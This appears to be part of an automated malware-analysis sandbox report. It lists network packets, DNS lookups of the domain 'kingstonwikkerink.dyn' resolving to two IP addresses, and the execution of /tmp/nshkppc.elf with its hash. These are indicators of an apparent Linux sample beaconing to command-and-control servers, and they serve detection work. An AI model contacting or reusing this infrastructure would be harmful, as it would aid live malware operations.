                                                                  Dec 18, 2024 00:03:56.643446922 CET523236252212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:56.643549919 CET362525232192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:56.763103008 CET523236252212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:58.824863911 CET523236252212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:03:58.825057030 CET362525232192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:03:58.944761992 CET523236252212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:03.548079014 CET3352424374192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:03.667795897 CET243743352480.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:03.667959929 CET3352424374192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:03.668004990 CET3352424374192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:03.787607908 CET243743352480.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:03.787801027 CET3352424374192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:03.907618046 CET243743352480.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:04.077065945 CET549248322192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:04.196796894 CET832254924212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:04.197061062 CET549248322192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:04.197129011 CET549248322192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:04.316751003 CET832254924212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:04.317012072 CET549248322192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:04.436630011 CET832254924212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:04.972639084 CET243743352480.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:04.972949982 CET3352424374192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:04.973050117 CET3352424374192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:06.496885061 CET832254924212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:06.497392893 CET549248322192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:06.617141008 CET832254924212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:10.217542887 CET410941851192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:10.337179899 CET185141094212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:10.337462902 CET410941851192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:10.337584972 CET410941851192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:10.458101034 CET185141094212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:10.458504915 CET410941851192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:10.578316927 CET185141094212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:11.740361929 CET343521402192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:11.860220909 CET140234352212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:11.860353947 CET343521402192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:11.860510111 CET343521402192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:11.980118990 CET140234352212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:11.980433941 CET343521402192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:12.101604939 CET140234352212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:12.703480959 CET185141094212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:12.703833103 CET410941851192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:12.823414087 CET185141094212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:14.215617895 CET140234352212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:14.216130972 CET343521402192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:14.335932970 CET140234352212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:17.947736025 CET4407616854192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:18.067291021 CET168544407680.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:18.067418098 CET4407616854192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:18.067500114 CET4407616854192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:18.187030077 CET168544407680.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:18.187145948 CET4407616854192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:18.306680918 CET168544407680.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:19.485060930 CET5839424738192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:19.604729891 CET2473858394212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:19.604840994 CET5839424738192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:19.604872942 CET5839424738192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:19.724524021 CET2473858394212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:19.724730968 CET5839424738192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:19.844321012 CET2473858394212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:21.903646946 CET2473858394212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:21.903845072 CET5839424738192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:22.023658037 CET2473858394212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:22.459619045 CET168544407680.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:22.459835052 CET4407616854192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:22.459835052 CET4407616854192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:27.148483992 CET463885956192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:27.268528938 CET595646388212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:27.268822908 CET463885956192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:27.268822908 CET463885956192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:27.388942957 CET595646388212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:27.389122963 CET463885956192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:27.512598038 CET595646388212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:27.709716082 CET463905956192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:27.829610109 CET595646390212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:27.829799891 CET463905956192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:27.830216885 CET463905956192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:27.950114965 CET595646390212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:27.950376987 CET463905956192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:28.070947886 CET595646390212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:29.597229958 CET595646388212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:29.597743988 CET463885956192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:29.717663050 CET595646388212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:30.149797916 CET595646390212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:30.150448084 CET463905956192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:30.270299911 CET595646390212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:34.844600916 CET3366820767192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:34.966602087 CET2076733668212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:34.966911077 CET3366820767192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:34.967003107 CET3366820767192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:35.086558104 CET2076733668212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:35.086750984 CET3366820767192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:35.206341982 CET2076733668212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:35.392474890 CET3987020767192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:35.512146950 CET207673987080.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:35.512281895 CET3987020767192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:35.512393951 CET3987020767192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:35.632029057 CET207673987080.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:35.632167101 CET3987020767192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:35.751962900 CET207673987080.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:36.816515923 CET207673987080.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:36.816972017 CET3987020767192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:36.816972017 CET3987020767192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:37.268709898 CET2076733668212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:37.269216061 CET3366820767192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:37.388856888 CET2076733668212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:42.087692022 CET511843266192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:42.207379103 CET326651184212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:42.207582951 CET511843266192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:42.207673073 CET511843266192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:42.327832937 CET326651184212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:42.328002930 CET511843266192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:42.447721004 CET326651184212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:44.534785986 CET326651184212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:44.535099030 CET511843266192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:44.654727936 CET326651184212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:49.777419090 CET5826025509192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:49.897169113 CET2550958260212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:49.897299051 CET5826025509192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:49.897300005 CET5826025509192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:50.016913891 CET2550958260212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:50.017039061 CET5826025509192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:50.137056112 CET2550958260212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:52.200778008 CET2550958260212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:52.201040030 CET5826025509192.168.2.23212.64.215.71
                                                                  Dec 18, 2024 00:04:52.320774078 CET2550958260212.64.215.71192.168.2.23
                                                                  Dec 18, 2024 00:04:52.530570984 CET485603266192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:52.650338888 CET32664856080.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:52.650536060 CET485603266192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:52.650640011 CET485603266192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:52.770307064 CET32664856080.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:52.770591021 CET485603266192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:52.890245914 CET32664856080.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:57.449186087 CET3287813872192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:57.568799019 CET138723287880.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:57.568967104 CET3287813872192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:57.569036007 CET3287813872192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:57.688656092 CET138723287880.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:04:57.688837051 CET3287813872192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:04:57.808680058 CET138723287880.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:05:01.870279074 CET138723287880.78.26.121192.168.2.23
                                                                  Dec 18, 2024 00:05:01.870450974 CET3287813872192.168.2.2380.78.26.121
                                                                  Dec 18, 2024 00:05:01.870495081 CET3287813872192.168.2.2380.78.26.121
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 18, 2024 00:02:56.552985907 CET5241253192.168.2.23178.254.22.166
                                                                  Dec 18, 2024 00:02:56.634915113 CET4225653192.168.2.23178.254.22.166
                                                                  Dec 18, 2024 00:03:01.559238911 CET5522853192.168.2.23185.181.61.24
                                                                  Dec 18, 2024 00:03:01.640480995 CET3857053192.168.2.23185.181.61.24
                                                                  Dec 18, 2024 00:03:01.820256948 CET5355228185.181.61.24192.168.2.23
                                                                  Dec 18, 2024 00:03:01.898901939 CET5338570185.181.61.24192.168.2.23
                                                                  Dec 18, 2024 00:03:09.332469940 CET4371753192.168.2.235.161.109.23
                                                                  Dec 18, 2024 00:03:14.339279890 CET5909153192.168.2.2364.176.6.48
                                                                  Dec 18, 2024 00:03:19.345571995 CET4824253192.168.2.23178.254.22.166
                                                                  Dec 18, 2024 00:03:24.351927042 CET4733753192.168.2.23137.220.52.23
                                                                  Dec 18, 2024 00:03:28.839308977 CET5321053192.168.2.235.161.109.23
                                                                  Dec 18, 2024 00:03:33.845861912 CET3473653192.168.2.2364.176.6.48
                                                                  Dec 18, 2024 00:03:36.814120054 CET3645053192.168.2.23178.254.22.166
                                                                  Dec 18, 2024 00:03:38.852448940 CET5607653192.168.2.23178.254.22.166
                                                                  Dec 18, 2024 00:03:41.820401907 CET3488453192.168.2.23152.53.15.127
                                                                  Dec 18, 2024 00:03:42.063971996 CET5334884152.53.15.127192.168.2.23
                                                                  Dec 18, 2024 00:03:43.858772993 CET4863853192.168.2.23137.220.52.23
                                                                  Dec 18, 2024 00:03:48.490120888 CET3397453192.168.2.2351.158.108.203
                                                                  Dec 18, 2024 00:03:48.729135990 CET533397451.158.108.203192.168.2.23
                                                                  Dec 18, 2024 00:03:56.163871050 CET4033753192.168.2.2351.158.108.203
                                                                  Dec 18, 2024 00:03:56.402832031 CET534033751.158.108.203192.168.2.23
                                                                  Dec 18, 2024 00:03:58.298536062 CET3933553192.168.2.23178.254.22.166
                                                                  Dec 18, 2024 00:04:03.304677963 CET4013253192.168.2.23152.53.15.127
                                                                  Dec 18, 2024 00:04:03.546899080 CET5340132152.53.15.127192.168.2.23
                                                                  Dec 18, 2024 00:04:03.827771902 CET4102953192.168.2.23152.53.15.127
                                                                  Dec 18, 2024 00:04:04.075582981 CET5341029152.53.15.127192.168.2.23
                                                                  Dec 18, 2024 00:04:09.976389885 CET4125753192.168.2.2351.158.108.203
                                                                  Dec 18, 2024 00:04:10.216341972 CET534125751.158.108.203192.168.2.23
                                                                  Dec 18, 2024 00:04:11.500499010 CET3541753192.168.2.23217.160.70.42
                                                                  Dec 18, 2024 00:04:11.739270926 CET5335417217.160.70.42192.168.2.23
                                                                  Dec 18, 2024 00:04:17.706649065 CET5982853192.168.2.2351.158.108.203
                                                                  Dec 18, 2024 00:04:17.946346998 CET535982851.158.108.203192.168.2.23
                                                                  Dec 18, 2024 00:04:19.218522072 CET3556753192.168.2.2365.21.1.106
                                                                  Dec 18, 2024 00:04:19.483758926 CET533556765.21.1.106192.168.2.23
                                                                  Dec 18, 2024 00:04:26.907639027 CET5530453192.168.2.2351.158.108.203
                                                                  Dec 18, 2024 00:04:27.147325993 CET535530451.158.108.203192.168.2.23
                                                                  Dec 18, 2024 00:04:27.462913990 CET5795453192.168.2.23152.53.15.127
                                                                  Dec 18, 2024 00:04:27.707247019 CET5357954152.53.15.127192.168.2.23
                                                                  Dec 18, 2024 00:04:34.600979090 CET5895453192.168.2.23202.61.197.122
                                                                  Dec 18, 2024 00:04:34.842796087 CET5358954202.61.197.122192.168.2.23
                                                                  Dec 18, 2024 00:04:35.152874947 CET5967853192.168.2.23217.160.70.42
                                                                  Dec 18, 2024 00:04:35.391486883 CET5359678217.160.70.42192.168.2.23
                                                                  Dec 18, 2024 00:04:41.821958065 CET5394553192.168.2.2365.21.1.106
                                                                  Dec 18, 2024 00:04:42.086241007 CET535394565.21.1.106192.168.2.23
                                                                  Dec 18, 2024 00:04:42.273092031 CET4670653192.168.2.2370.34.254.19
                                                                  Dec 18, 2024 00:04:47.278882980 CET5284053192.168.2.23137.220.52.23
                                                                  Dec 18, 2024 00:04:49.537367105 CET4017553192.168.2.2351.158.108.203
                                                                  Dec 18, 2024 00:04:49.776453018 CET534017551.158.108.203192.168.2.23
                                                                  Dec 18, 2024 00:04:52.284758091 CET4613153192.168.2.23202.61.197.122
                                                                  Dec 18, 2024 00:04:52.529372931 CET5346131202.61.197.122192.168.2.23
                                                                  Dec 18, 2024 00:04:57.203093052 CET3331253192.168.2.23202.61.197.122
                                                                  Dec 18, 2024 00:04:57.448103905 CET5333312202.61.197.122192.168.2.23
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 18, 2024 00:02:56.552985907 CET192.168.2.23178.254.22.1660x6ba6Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:02:56.634915113 CET192.168.2.23178.254.22.1660x6ba6Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:01.559238911 CET192.168.2.23185.181.61.240x3f17Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:01.640480995 CET192.168.2.23185.181.61.240x3f17Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:09.332469940 CET192.168.2.235.161.109.230xfe4dStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:14.339279890 CET192.168.2.2364.176.6.480x8736Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:19.345571995 CET192.168.2.23178.254.22.1660x6ccbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:24.351927042 CET192.168.2.23137.220.52.230xcd70Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:28.839308977 CET192.168.2.235.161.109.230xfe4dStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:33.845861912 CET192.168.2.2364.176.6.480x8736Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:36.814120054 CET192.168.2.23178.254.22.1660x9dcaStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:38.852448940 CET192.168.2.23178.254.22.1660x6ccbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:41.820401907 CET192.168.2.23152.53.15.1270x984aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:43.858772993 CET192.168.2.23137.220.52.230xcd70Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:48.490120888 CET192.168.2.2351.158.108.2030xcdd1Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:56.163871050 CET192.168.2.2351.158.108.2030x56cbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:58.298536062 CET192.168.2.23178.254.22.1660x9dcaStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:03.304677963 CET192.168.2.23152.53.15.1270x984aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:03.827771902 CET192.168.2.23152.53.15.1270x2022Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:09.976389885 CET192.168.2.2351.158.108.2030xcdd1Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:11.500499010 CET192.168.2.23217.160.70.420x3763Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:17.706649065 CET192.168.2.2351.158.108.2030x56cbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:19.218522072 CET192.168.2.2365.21.1.1060xecacStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:26.907639027 CET192.168.2.2351.158.108.2030x437Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:27.462913990 CET192.168.2.23152.53.15.1270x2022Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:34.600979090 CET192.168.2.23202.61.197.1220x9d06Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:35.152874947 CET192.168.2.23217.160.70.420x3763Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:41.821958065 CET192.168.2.2365.21.1.1060xecacStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:42.273092031 CET192.168.2.2370.34.254.190x2285Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:47.278882980 CET192.168.2.23137.220.52.230x8050Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:49.537367105 CET192.168.2.2351.158.108.2030x437Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:52.284758091 CET192.168.2.23202.61.197.1220x5214Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:57.203093052 CET192.168.2.23202.61.197.1220x9d06Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 18, 2024 00:03:01.820256948 CET185.181.61.24192.168.2.230x3f17No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:01.820256948 CET185.181.61.24192.168.2.230x3f17No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:01.898901939 CET185.181.61.24192.168.2.230x3f17No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:01.898901939 CET185.181.61.24192.168.2.230x3f17No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:42.063971996 CET152.53.15.127192.168.2.230x984aNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:42.063971996 CET152.53.15.127192.168.2.230x984aNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:48.729135990 CET51.158.108.203192.168.2.230xcdd1No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:48.729135990 CET51.158.108.203192.168.2.230xcdd1No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:56.402832031 CET51.158.108.203192.168.2.230x56cbNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:03:56.402832031 CET51.158.108.203192.168.2.230x56cbNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:03.546899080 CET152.53.15.127192.168.2.230x984aNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:03.546899080 CET152.53.15.127192.168.2.230x984aNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:04.075582981 CET152.53.15.127192.168.2.230x2022No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:04.075582981 CET152.53.15.127192.168.2.230x2022No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:10.216341972 CET51.158.108.203192.168.2.230xcdd1No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:10.216341972 CET51.158.108.203192.168.2.230xcdd1No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:11.739270926 CET217.160.70.42192.168.2.230x3763No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:11.739270926 CET217.160.70.42192.168.2.230x3763No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:17.946346998 CET51.158.108.203192.168.2.230x56cbNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:17.946346998 CET51.158.108.203192.168.2.230x56cbNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:19.483758926 CET65.21.1.106192.168.2.230xecacNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:19.483758926 CET65.21.1.106192.168.2.230xecacNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:27.147325993 CET51.158.108.203192.168.2.230x437No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:27.147325993 CET51.158.108.203192.168.2.230x437No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:27.707247019 CET152.53.15.127192.168.2.230x2022No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:27.707247019 CET152.53.15.127192.168.2.230x2022No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:34.842796087 CET202.61.197.122192.168.2.230x9d06No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:34.842796087 CET202.61.197.122192.168.2.230x9d06No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:35.391486883 CET217.160.70.42192.168.2.230x3763No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:35.391486883 CET217.160.70.42192.168.2.230x3763No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:42.086241007 CET65.21.1.106192.168.2.230xecacNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:42.086241007 CET65.21.1.106192.168.2.230xecacNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:49.776453018 CET51.158.108.203192.168.2.230x437No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:49.776453018 CET51.158.108.203192.168.2.230x437No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:52.529372931 CET202.61.197.122192.168.2.230x5214No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:52.529372931 CET202.61.197.122192.168.2.230x5214No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:57.448103905 CET202.61.197.122192.168.2.230x9d06No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 00:04:57.448103905 CET202.61.197.122192.168.2.230x9d06No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false

                                                                  System Behavior

                                                                  Start time (UTC):23:02:55
                                                                  Start date (UTC):17/12/2024
                                                                  Path:/tmp/nshkppc.elf
                                                                  Arguments:/tmp/nshkppc.elf
                                                                  File size:5388968 bytes
                                                                  MD5 hash:ae65271c943d3451b7f026d1fadccea6

